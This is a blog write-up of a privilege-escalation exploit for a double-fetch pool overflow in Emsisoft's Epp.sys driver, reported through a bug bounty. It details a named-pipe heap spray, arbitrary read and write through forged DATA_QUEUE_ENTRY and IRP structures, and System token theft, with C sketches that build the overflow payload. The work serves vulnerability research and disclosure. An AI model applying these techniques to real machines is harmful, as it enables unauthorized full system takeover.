Exploitation of a non-paged pool overflow

Posted Oct 18, 2024 Updated Dec 14, 2024

By Adam Babis

Hello, this is my first write-up. I hope you find it interesting to read :)

Introduction

In this blog post I describe how I exploited a heap-based buffer overflow in one of Emsisoft’s kernel drivers to achieve privilege escalation. One of the kernel drivers that Emsisoft Anti-Malware uses is Epp.sys. We can communicate with this driver through IOCTL requests, because the driver creates a device object and sets a device I/O control dispatch routine in its driver object. Moreover, any user can open a handle to this device, which makes it a great attack surface for finding vulnerabilities that lead to privilege escalation.

The figure above shows the decompiled function that creates the device and sets the dispatch routines.

When DeviceIoControl is called with I/O control code 0x22240C, the Epp driver tries to copy Peb→ProcessParameters→CommandLine.buffer and Peb→ProcessParameters→CurrentDirectory→DosPath.buffer to the output buffer. The process these strings are copied from is selected by the PID in the input buffer. This I/O control code specifies buffered I/O, which means the driver writes its output to Irp→AssociatedIrp→SystemBuffer, and that buffer is allocated in the non-paged pool. Before copying the strings, the driver checks whether they fit in the system buffer and copies them only if they do. However, there is a double-fetch vulnerability: the driver fetches the length of DosPath twice, once for the check and once for the copy. If the length of this Unicode string changes after the first fetch and before the second, the copy overflows the buffer. The figure below shows the decompiled vulnerable code. Note that OutputBuffer is a pointer to SystemBuffer + 0x8.
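To see why 0x22240C means buffered I/O, the control code can be split into the bit fields that the Windows CTL_CODE macro packs together. The sketch below is only an illustration; the struct and function names are made up for this example and are not part of the driver or the exploit.

```c
#include <assert.h>
#include <stdint.h>

/* Bit layout produced by the Windows CTL_CODE macro:
   31..16 device type | 15..14 required access | 13..2 function | 1..0 transfer method */
typedef struct {
    uint32_t device_type;
    uint32_t access;
    uint32_t function;
    uint32_t method;
} IoctlFields;

/* Splits an I/O control code into its four fields. */
static IoctlFields decode_ioctl(uint32_t code)
{
    IoctlFields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* Transfer method names, indexed by their numeric value (0..3). */
static const char *method_name(uint32_t method)
{
    static const char *const names[] = {
        "METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"
    };
    assert(method < 4);
    return names[method];
}
```

For 0x22240C this gives device type 0x22 (FILE_DEVICE_UNKNOWN), access 0 (FILE_ANY_ACCESS), function 0x903 and method 0, which is METHOD_BUFFERED.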

The figure above shows the decompiled vulnerable function.
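The double fetch described above can be modeled in a few lines of portable C. This is a simplified sketch and not the driver’s code: UserString, RaceHook and both copy functions are hypothetical names, and the racing thread is replaced by a hook that runs between the two fetches so the behavior is deterministic.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified stand-in for a UNICODE_STRING that lives in user-writable memory. */
typedef struct {
    volatile uint16_t Length;   /* byte length, may change at any time */
    const uint8_t    *Buffer;
} UserString;

/* Hook that runs between check and copy; models the racing user-mode thread. */
typedef void (*RaceHook)(UserString *s);

/* Vulnerable pattern: Length is read once for the check and again for the copy.
   Returns the number of bytes copied, or 0 if the check rejected the string. */
static size_t copy_double_fetch(uint8_t *dst, size_t dst_cap, UserString *s, RaceHook hook)
{
    size_t n;
    assert(dst != NULL && s != NULL);
    if (s->Length > dst_cap)        /* fetch #1: bounds check */
        return 0;
    if (hook) hook(s);              /* window in which Length can change */
    n = s->Length;                  /* fetch #2: copy size */
    memcpy(dst, s->Buffer, n);
    return n;
}

/* Same routine with a single fetch: the checked value is the copied value. */
static size_t copy_single_fetch(uint8_t *dst, size_t dst_cap, UserString *s, RaceHook hook)
{
    size_t n;
    assert(dst != NULL && s != NULL);
    n = s->Length;                  /* only fetch */
    if (n > dst_cap)
        return 0;
    if (hook) hook(s);
    memcpy(dst, s->Buffer, n);
    return n;
}

/* Example hook: grows the length after the check has passed. */
static void grow_length(UserString *s) { s->Length = 0x80; }
```

With a logical capacity of 0x60 and an initial Length of 0x20, the first function copies 0x80 bytes once the hook fires, while the second still copies 0x20. When trying this out, the destination should be backed by at least 0x80 bytes of real storage so the model itself stays memory safe.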

Exploitation

Before exploiting a bug I always write down what I can and cannot do, to make the exploitation process clearer. In this case:

We can overflow the non-paged pool with controlled data
We can control the size of the buffer that will be overflowed
After a call to DeviceIoControl we can’t tell whether the buffer was overflowed, because there is no way to know whether the race was won
We can’t directly control how many bytes will overflow, because SystemBuffer is cache aligned and in theory we can never know how many bytes will be used to align it to a cache line. I describe this in more detail below.

The system buffer is allocated cache aligned, which means that the real allocation size for it is sizeof(POOL_HEADER) + 0x40 + output buffer size (assuming the output buffer size is greater than the input buffer size and smaller than 0x1B0). The additional 0x40 bytes are needed to align SystemBuffer to a cache line, because 0x40 is the usual cache line size. Since we never know at which address the allocation will land, in theory we can’t control how many bytes will overflow, because we don’t know how many bytes will be used for alignment. To make this clearer, here are two examples. In the following WinDbg screenshots the r15 register holds a pointer to SystemBuffer, the output buffer size is 0x40, and the output buffer is larger than the input buffer.

In the example above the allocated size is 0x90: 0x40 (output buffer size) + 0x40 (alignment) + 0x10 (POOL_HEADER). Subtracting the address of the allocation from the address of SystemBuffer gives 0x30, which consists of the pool header (0x10 bytes) and 0x20 bytes of alignment. So in this case there are 0x20 bytes of padding (0x40 – 0x20 = 0x20) between the end of SystemBuffer and the next pool header. The next example shows a case where the allocation lands at a different address, so the alignment is different.

In the figure above the offset from the start of the allocation to SystemBuffer is 0x10 (the size of the pool header): the allocation landed at a different address, so a different number of bytes was used for alignment. In this case, to overflow out of SystemBuffer we also have to overwrite 0x40 bytes of padding, because there are 0x40 bytes between the end of SystemBuffer and the next pool header.
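The arithmetic behind both examples can be reproduced with a small model. It assumes that SystemBuffer is simply the first 0x40-aligned address after the pool header, which is consistent with the two cases above but is my simplification, not a statement about the allocator’s internals. The addresses used when calling it are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define POOL_HEADER_SIZE 0x10u
#define CACHE_LINE       0x40u

typedef struct {
    uint64_t alloc_size;  /* whole allocation, pool header included */
    uint64_t lead;        /* bytes from allocation start to SystemBuffer */
    uint64_t trail;       /* bytes from SystemBuffer end to the next pool header */
} BufferLayout;

/* Models where a cache-aligned SystemBuffer ends up inside its allocation. */
static BufferLayout layout_for(uint64_t chunk_addr, uint64_t out_size)
{
    BufferLayout l;
    uint64_t data, aligned;
    assert((chunk_addr & 0xFu) == 0);   /* pool allocations are 16-byte aligned */
    data    = chunk_addr + POOL_HEADER_SIZE;
    aligned = (data + CACHE_LINE - 1) & ~(uint64_t)(CACHE_LINE - 1);
    l.alloc_size = POOL_HEADER_SIZE + CACHE_LINE + out_size;
    l.lead       = aligned - chunk_addr;
    l.trail      = l.alloc_size - l.lead - out_size;
    return l;
}
```

For an output buffer of 0x40 bytes, an allocation whose address ends in 0x10 gives lead 0x30 and trail 0x20 (the first example), while one whose address ends in 0x30 gives lead 0x10 and trail 0x40 (the second example).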

However, I found a way to control the number of bytes used for alignment. If the allocation is served by the LFH and its size modulo 0x40 is 0, the alignment is always the same, so we can control the overflow size. For example, if the output buffer size is 0x70, the allocation is 0x70 + 0x40 (alignment) + 0x10 (pool header) = 0xC0 bytes. Since 0xC0 modulo 0x40 is 0, the alignment of the system buffer is always the same; in this example it is always 0x20 bytes. The allocation therefore looks like this: POOL_HEADER + 0x20 bytes of alignment + SystemBuffer + 0x20 bytes of padding.

After DeviceIoControl is called, Epp.sys copies CommandLine.buffer to SystemBuffer + 0x8. To keep things simple, my exploit sets CommandLine.length to 8. DosPath.buffer is the string used for the overflow, and it is copied to SystemBuffer + 0x10. So to trigger the overflow we have to flip DosPath.length very quickly between a value smaller than output buffer size – 0x10 (the offset in SystemBuffer) and a value greater than output buffer size – 0x10 (the offset in SystemBuffer) + 0x20 (the padding).
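A short sketch can illustrate both points: why a size that is a multiple of 0x40 gives a fixed alignment, and which two DosPath lengths the race flips between. It assumes that blocks of one LFH bucket are laid out back to back with a stride equal to the allocation size, and that the first block sits at an address ending in 0x10; both are assumptions chosen to match the numbers above. All names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define POOL_HEADER_SIZE 0x10u
#define CACHE_LINE       0x40u
#define COPY_OFFSET      0x10u   /* DosPath is copied to SystemBuffer + 0x10 */

static uint64_t alloc_size_for(uint64_t out_size)
{
    return POOL_HEADER_SIZE + CACHE_LINE + out_size;
}

/* Bytes from the allocation start to the cache-aligned SystemBuffer. */
static uint64_t lead_for(uint64_t chunk_addr)
{
    uint64_t data    = chunk_addr + POOL_HEADER_SIZE;
    uint64_t aligned = (data + CACHE_LINE - 1) & ~(uint64_t)(CACHE_LINE - 1);
    return aligned - chunk_addr;
}

/* Returns 1 if every block at first_slot + i * stride gets the same lead. */
static int lead_is_constant(uint64_t first_slot, uint64_t stride, unsigned slots)
{
    uint64_t first = lead_for(first_slot);
    unsigned i;
    for (i = 1; i < slots; i++)
        if (lead_for(first_slot + i * stride) != first)
            return 0;
    return 1;
}

typedef struct {
    uint64_t fits_limit;        /* lengths below this pass the size check */
    uint64_t reach_next_chunk;  /* lengths above this write past the padding */
} RaceLengths;

static RaceLengths race_lengths(uint64_t out_size, uint64_t trail)
{
    RaceLengths r;
    assert(out_size >= COPY_OFFSET);
    r.fits_limit       = out_size - COPY_OFFSET;
    r.reach_next_chunk = out_size - COPY_OFFSET + trail;
    return r;
}
```

With an output buffer of 0x70 bytes the allocation is 0xC0 bytes, the lead stays constant for a stride of 0xC0 (it does not for 0x90), and the two lengths are 0x60 and 0x80.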

Since the system buffer is allocated in the non-paged pool, I decided to overflow into DATA_QUEUE_ENTRY structures to build arbitrary read and write primitives. DATA_QUEUE_ENTRY is an undocumented structure that named pipes use to hold the data written to them. Here is the definition of that structure:

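struct DATA_QUEUE_ENTRY
{
    LIST_ENTRY NextEntry;                       // links the entries queued on one pipe
    _IRP* Irp;                                  // IRP tied to the entry (unbuffered entries)
    _SECURITY_CLIENT_CONTEXT* SecurityContext;
    uint32_t EntryType;                         // 0 = buffered, 1 = unbuffered
    uint32_t QuotaInEntry;
    uint32_t DataSize;                          // number of data bytes held by the entry
    uint32_t x;                                 // unknown
    char Data[];                                // pipe data of a buffered entry
};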
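For experimenting with the sizes used in the rest of this post, the structure can be mirrored with fixed-width fields so it has the x64 layout on any platform. This is a hypothetical helper, not part of the exploit: DataQueueEntry64, ListEntry64 and pipe_chunk_size are names I made up, and the flexible Data member is left out because only the header size matters here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define POOL_HEADER_SIZE 0x10u

/* LIST_ENTRY with 64-bit pointers stored as integers. */
typedef struct {
    uint64_t Flink;
    uint64_t Blink;
} ListEntry64;

/* Mirror of the DATA_QUEUE_ENTRY header as laid out on x64. */
typedef struct {
    ListEntry64 NextEntry;
    uint64_t    Irp;
    uint64_t    SecurityContext;
    uint32_t    EntryType;
    uint32_t    QuotaInEntry;
    uint32_t    DataSize;
    uint32_t    x;
    /* the pipe data follows directly after this header */
} DataQueueEntry64;

/* Sanity check: the mirror must have the 0x30-byte size the arithmetic relies on. */
static void check_layout(void)
{
    assert(sizeof(DataQueueEntry64) == 0x30);
    assert(offsetof(DataQueueEntry64, EntryType) == 0x20);
}

/* Pool allocation size for a pipe write of data_len bytes. */
static uint64_t pipe_chunk_size(uint64_t data_len)
{
    return POOL_HEADER_SIZE + sizeof(DataQueueEntry64) + data_len;
}
```

A write of 0x80 bytes gives an allocation of 0xC0 bytes and a write of 0x40 bytes gives 0x80 bytes, which are the two sizes used in the sprays.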

DATA_QUEUE_ENTRY is commonly used in kernel exploitation, and how to use it to achieve arbitrary read and write is well documented. I highly recommend reading this first, because it explains what each member of the structure does, and I won’t describe it in as much detail here.

Achieving arbitrary read

My exploit creates 10000 named pipes and writes 0x80 bytes of data to each of them. I chose 0x80 because 0x80 + sizeof(DATA_QUEUE_ENTRY) + sizeof(POOL_HEADER) is 0xC0, so the allocation size modulo 0x40 is 0. Since the size is smaller than 0x200, the allocation is handled by the LFH. The exploit then frees some of these named pipes to make “holes” between the data queue entries. After that there is a high chance that the system buffer will land next to a data queue entry. For this to work, the allocation for the system buffer has to be 0xC0 bytes as well, so the output buffer size has to be 0x70 (0x70 + 0x40 alignment + 0x10 pool header).

Next we prepare DosPath so that it overflows the pool header and the Flink of NextEntry of the adjacent DATA_QUEUE_ENTRY. The overwritten Flink has to point to a DATA_QUEUE_ENTRY in user address space. In that user-mode data queue entry we set EntryType to 1, DataSize to the number of bytes we want to read, and Irp to a pointer to an IRP. That IRP has to have AssociatedIrp.SystemBuffer set to the address we want to read from. Once this is done, we can trigger the buffer overflow.

To find out whether a data queue entry was overflowed, we read data from every named pipe using PeekNamedPipe. If a pipe contains more data than was written to it, we have overflowed the data queue entry that belongs to that pipe. Then, by calling PeekNamedPipe and reading 0x80 bytes (the amount written to each pipe earlier) plus the number of bytes we want to read, we can read arbitrary memory.
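The layout of the overflow data and of the forged user-mode entry can be sketched as follows. This is my reconstruction from the offsets given above, not the code of the actual exploit. Several things are assumptions: the 0x18 offset of AssociatedIrp.SystemBuffer inside an x64 IRP, the fake IRP living in user memory, the 0x41 filler, and the contents of the pool header, which the caller has to supply. All names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define OUT_SIZE         0x70u
#define COPY_OFFSET      0x10u   /* DosPath lands at SystemBuffer + 0x10 */
#define TRAIL_PAD        0x20u   /* padding after SystemBuffer in a 0xC0 chunk */
#define POOL_HEADER_SIZE 0x10u
#define HEADER_AT        (OUT_SIZE - COPY_OFFSET + TRAIL_PAD)      /* 0x80 */
#define PAYLOAD_SIZE     (HEADER_AT + POOL_HEADER_SIZE + 8u)       /* 0x98 */
#define IRP_SYSTEMBUFFER_OFFSET 0x18u   /* assumption: x64 IRP layout */

/* x64 mirror of the DATA_QUEUE_ENTRY header (pointers stored as integers). */
typedef struct {
    uint64_t Flink, Blink;
    uint64_t Irp;
    uint64_t SecurityContext;
    uint32_t EntryType;
    uint32_t QuotaInEntry;
    uint32_t DataSize;
    uint32_t x;
} DataQueueEntry64;

/* Fills the forged entry and the fake IRP it points to. */
static void forge_read_entry(DataQueueEntry64 *entry, uint8_t *fake_irp,
                             size_t irp_size, uint64_t target, uint32_t size)
{
    assert(irp_size >= IRP_SYSTEMBUFFER_OFFSET + sizeof target);
    memset(entry, 0, sizeof *entry);
    memset(fake_irp, 0, irp_size);
    memcpy(fake_irp + IRP_SYSTEMBUFFER_OFFSET, &target, sizeof target);
    entry->Irp       = (uint64_t)(uintptr_t)fake_irp;
    entry->EntryType = 1;      /* unbuffered: data is taken from the IRP */
    entry->DataSize  = size;   /* number of bytes to read from target */
}

/* Builds the DosPath contents: filler up to the next pool header, the
   header bytes supplied by the caller, then the new NextEntry.Flink. */
static void build_payload(uint8_t payload[PAYLOAD_SIZE],
                          const uint8_t pool_header[POOL_HEADER_SIZE],
                          uint64_t forged_entry_addr)
{
    memset(payload, 0x41, HEADER_AT);
    memcpy(payload + HEADER_AT, pool_header, POOL_HEADER_SIZE);
    memcpy(payload + HEADER_AT + POOL_HEADER_SIZE,
           &forged_entry_addr, sizeof forged_entry_addr);
}
```

The payload is 0x98 bytes long: 0x60 bytes for the rest of SystemBuffer, 0x20 bytes of padding, 0x10 bytes of pool header and 8 bytes for the Flink.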

When I wrote this exploit, Windows 24H2 had not been released yet, but I decided to make exploitation harder and make the exploit work without leaking kernel addresses through NtQuerySystemInformation. For those who don’t know: starting with 24H2, medium-integrity processes can no longer leak the addresses of some kernel structures using NtQuerySystemInformation.

To bypass kASLR and achieve arbitrary write, we need to overflow another buffer. To do so, my exploit creates another 15000 named pipes and writes 0x40 bytes of data to each one, so that each buffer allocated for a data queue entry is 0x80 bytes (0x40 + sizeof(DATA_QUEUE_ENTRY) + sizeof(POOL_HEADER)). The first unsigned int of the data written to each pipe is a number that identifies that pipe; I use it later to find the pipe. The exploit then frees some of these pipes to make “holes” between the data queue entries and triggers another buffer overflow, which overwrites a pool header and the adjacent data queue entry. In the overwritten entry the exploit sets EntryType to 0 and DataSize to 0x40 + sizeof(POOL_HEADER) + sizeof(DATA_QUEUE_ENTRY) + sizeof(unsigned int). This turns the entry into a relative read primitive: with PeekNamedPipe we can read the memory that follows the entry. The last unsigned int of the data read this way is the number mentioned earlier, which identifies the pipe that owns the following entry.

Next, my exploit writes some data to that pipe using NtFsControlFile with control code 0x119FF8, which makes the pipe store the written data in an unbuffered data queue entry. Since we know the address of one data queue entry of that pipe, we can find the address of the new entry, because the entries are linked in a doubly linked list (NextEntry in DATA_QUEUE_ENTRY). Unbuffered data queue entries allocate an IRP and hold a pointer to it, so we can read that IRP.
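The relative read described above returns a fixed layout, which a small parser makes explicit. This is a sketch under my reading of the sizes: the leaked bytes consist of the corrupted entry’s own 0x40 bytes of data, the next pool header, the next DATA_QUEUE_ENTRY header and the first 4 bytes of the next pipe’s data. That the neighbor’s NextEntry.Flink is what provides a kernel address of its queue is my interpretation, and the function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define POOL_HEADER_SIZE      0x10u
#define DQE_SIZE              0x30u   /* sizeof(DATA_QUEUE_ENTRY) on x64 */
#define PIPE_DATA_SIZE        0x40u
#define RELATIVE_READ_SIZE    (PIPE_DATA_SIZE + POOL_HEADER_SIZE + DQE_SIZE + 4u)  /* 0x84 */
#define NEIGHBOR_ENTRY_OFFSET (PIPE_DATA_SIZE + POOL_HEADER_SIZE)                  /* 0x50 */

/* Identifier of the neighboring pipe: the last 4 bytes of the leak. */
static uint32_t neighbor_pipe_id(const uint8_t *leak, size_t leak_len)
{
    uint32_t id;
    assert(leak_len >= RELATIVE_READ_SIZE);
    memcpy(&id, leak + RELATIVE_READ_SIZE - sizeof id, sizeof id);
    return id;
}

/* NextEntry.Flink of the neighboring entry: the first field of its header. */
static uint64_t neighbor_flink(const uint8_t *leak, size_t leak_len)
{
    uint64_t flink;
    assert(leak_len >= NEIGHBOR_ENTRY_OFFSET + sizeof flink);
    memcpy(&flink, leak + NEIGHBOR_ENTRY_OFFSET, sizeof flink);
    return flink;
}
```

The DataSize written into the corrupted entry is therefore 0x84, and the identifier sits at offset 0x80 of the data returned by PeekNamedPipe.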
After reading that IRP, we can take ThreadListEntry from it; that list has a pointer to an ETHREAD structure. ETHREAD has a pointer to the EPROCESS structure, so with arbitrary read we can leak an EPROCESS address. All EPROCESS structures are linked in a doubly linked list, so from one EPROCESS address we can reach every other one. We traverse that list looking for the EPROCESS of the System process and of the current process, and then read the token pointer from the System EPROCESS.

All that is left is to overwrite the token pointer in the current process’s EPROCESS with the System token. To do that we first have to forge an IRP; we can base it on the IRP we read earlier. We set irp→AssociatedIrp.SystemBuffer to a pointer to the pointer to the System token, and irp→UserBuffer to the address of the token pointer in the EPROCESS of the current process. Then we clear IRP_DEALLOCATE_BUFFER in irp→Flags and set IRP_BUFFERED_IO | IRP_INPUT_OPERATION. Next we set irp→ThreadListEntry.Flink and irp→ThreadListEntry.Blink to point to some LIST_ENTRY.

Once the forged IRP is ready, we have to place it in kernel address space. To do so we write it to a named pipe using NtFsControlFile and find its location by traversing the doubly linked list of data queue entries. After locating it, we set the Flink and Blink pointers of the previously mentioned LIST_ENTRY to the address of the forged irp→ThreadListEntry, so that ThreadListEntry is properly linked into a list. In other words, the following condition has to hold: irp->ThreadListEntry.Flink->Blink == irp->ThreadListEntry.Blink->Flink == &irp->ThreadListEntry.

With the forged IRP prepared, we store a pointer to it in the data queue entry that we use for arbitrary read and then read 1 byte from that named pipe. This overwrites the token pointer in the current process’s EPROCESS with the System token. After that we can simply spawn an elevated command prompt.
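Two details of the forged IRP are easy to get wrong: the flag arithmetic and the list condition. The sketch below models both in portable C. The flag values are the ones defined in the WDK headers; ListEntry is a plain stand-in for LIST_ENTRY, and the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* IRP flag values as defined in the WDK headers. */
#define IRP_BUFFERED_IO       0x00000010u
#define IRP_DEALLOCATE_BUFFER 0x00000020u
#define IRP_INPUT_OPERATION   0x00000040u

/* Clears IRP_DEALLOCATE_BUFFER and sets the two flags that make I/O
   completion copy SystemBuffer to the user buffer. */
static uint32_t forged_irp_flags(uint32_t original)
{
    return (original & ~IRP_DEALLOCATE_BUFFER) | IRP_BUFFERED_IO | IRP_INPUT_OPERATION;
}

/* Plain stand-in for LIST_ENTRY. */
typedef struct ListEntry {
    struct ListEntry *Flink;
    struct ListEntry *Blink;
} ListEntry;

/* The condition from the text: both neighbors must point back at the entry. */
static int list_entry_is_consistent(const ListEntry *e)
{
    assert(e->Flink != 0 && e->Blink != 0);
    return e->Flink->Blink == e && e->Blink->Flink == e;
}

/* Links the IRP's ThreadListEntry with one helper LIST_ENTRY in both directions. */
static void link_pair(ListEntry *irp_entry, ListEntry *helper)
{
    irp_entry->Flink = helper;
    irp_entry->Blink = helper;
    helper->Flink    = irp_entry;
    helper->Blink    = irp_entry;
}
```

Starting from flags 0x30, the forged value is 0x50. After link_pair the consistency check passes, and it fails as soon as one of the helper’s pointers stops pointing at the IRP’s entry.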
I tested this exploit on Windows 22H2, but it should work on 24H2 as well. Here is a video proof of concept for this vulnerability:

And here is the source code of my exploit.

I reported this vulnerability to the Emsisoft bug bounty program and earned $300.

This exploit is quite complex, and I hope I described it clearly. Thank you for reading this write-up :)

buffer overflow

exploitation

This post is licensed under CC BY 4.0 by the author.